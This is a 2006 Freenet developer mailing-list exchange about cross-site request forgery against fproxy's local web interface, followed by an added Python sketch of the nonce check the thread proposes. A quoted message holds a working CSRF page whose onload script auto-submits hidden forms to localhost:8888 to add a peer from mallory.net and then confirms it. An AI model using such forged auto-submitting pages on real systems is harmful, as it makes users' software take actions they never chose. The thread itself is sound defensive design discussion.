On Fri, Jun 02, 2006 at 01:41:55PM +0100, Michael Rogers wrote:
> Matthew Toseland wrote:
> >So not only can it not read a frame from a different domain, it can't
> >open one in a hidden iframe and then submit it either?
> 
> The script doesn't need to submit the same confirmation returned by the 
> server - it can just fake it like it did with the original form.

Well, yes, but if it can't do that, could it open the page in a subframe
and then submit that?
> 
> Something like this:
> 
> ...
> <script type='text/javascript'>
> function submitFirst() {
>       document.forms['form'].submit();
>       window.setTimeout ('submitSecond()', 2000);
> }
> function submitSecond() {
>       document.forms['confirmation'].submit();
> }
> </script>
> </head>
> <body onload='submitFirst()'>
> <form name='form' action='http://localhost:8888/darknet/' method='post' 
> enctype='multipart/form-data' target='hidden_iframe'>
> <input name='url' type='hidden' value='http://mallory.net/ref.txt' />
> <input name='connect' type='hidden' value='Connect' />
> </form>
> <form name='confirmation' action='http://localhost:8888/confirm/' 
> method='post' enctype='multipart/form-data' target='hidden_iframe'>
> <input name='areYouSure' type='hidden' value='Yes' />
> </form>
> ...
> 
> As far as I can see, the only way to prevent this is to put a nonce in a 
> hidden field in the form. If the nonce doesn't match when the form is 
> submitted, ignore the request and maybe alert the user.

Right. So we reconfirm dangerous operations (especially if the referer
is set to somewhere outside fproxy), with a hidden field. Will implement
that soon.
> 
> Cheers,
> Michael

-- 
Matthew J Toseland - toad at amphibian.dyndns.org
Freenet Project Official Codemonkey - http://freenetproject.org/
ICTHUS - Nothing is impossible. Our Boss says so.
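
The nonce-in-a-hidden-field check proposed in this thread, sketched as an added example (not Freenet's fproxy code and not from either poster). The class name, field name `nonce` and the operation string are hypothetical; the point is that the forged `areYouSure=Yes` post carries no value the server issued, and the attacking page cannot read one out of the cross-domain frame.

```python
import hmac
import secrets
from html import escape


class ConfirmationGuard:
    """Issues one-time nonces for confirmation forms and checks them on submit."""

    def __init__(self):
        # nonce -> the dangerous operation it authorises (kept server-side,
        # so the request cannot swap in a different operation)
        self._pending = {}

    def render_confirmation(self, operation):
        """Return the confirmation form with a fresh nonce in a hidden field."""
        nonce = secrets.token_urlsafe(32)
        self._pending[nonce] = operation
        return (
            "<form action='/confirm/' method='post'>"
            f"<input name='nonce' type='hidden' value='{escape(nonce, quote=True)}' />"
            "<input name='areYouSure' type='submit' value='Yes' />"
            "</form>"
        )

    def handle_confirm(self, fields):
        """Return (accepted, detail) for the posted form fields."""
        submitted = fields.get("nonce", "").encode()
        # Constant-time comparison against every nonce still outstanding.
        match = next(
            (n for n in self._pending
             if hmac.compare_digest(n.encode(), submitted)),
            None,
        )
        if match is None:
            return False, "ignored: nonce missing or unknown"
        operation = self._pending.pop(match)  # single use, even on "No"
        if fields.get("areYouSure") != "Yes":
            return False, "cancelled"
        return True, operation


if __name__ == "__main__":
    guard = ConfirmationGuard()
    guard.render_confirmation("connect <constructed reference URL>")
    # Constructed request mirroring the second auto-submitted form in the thread.
    print(guard.handle_confirm({"areYouSure": "Yes"}))
```
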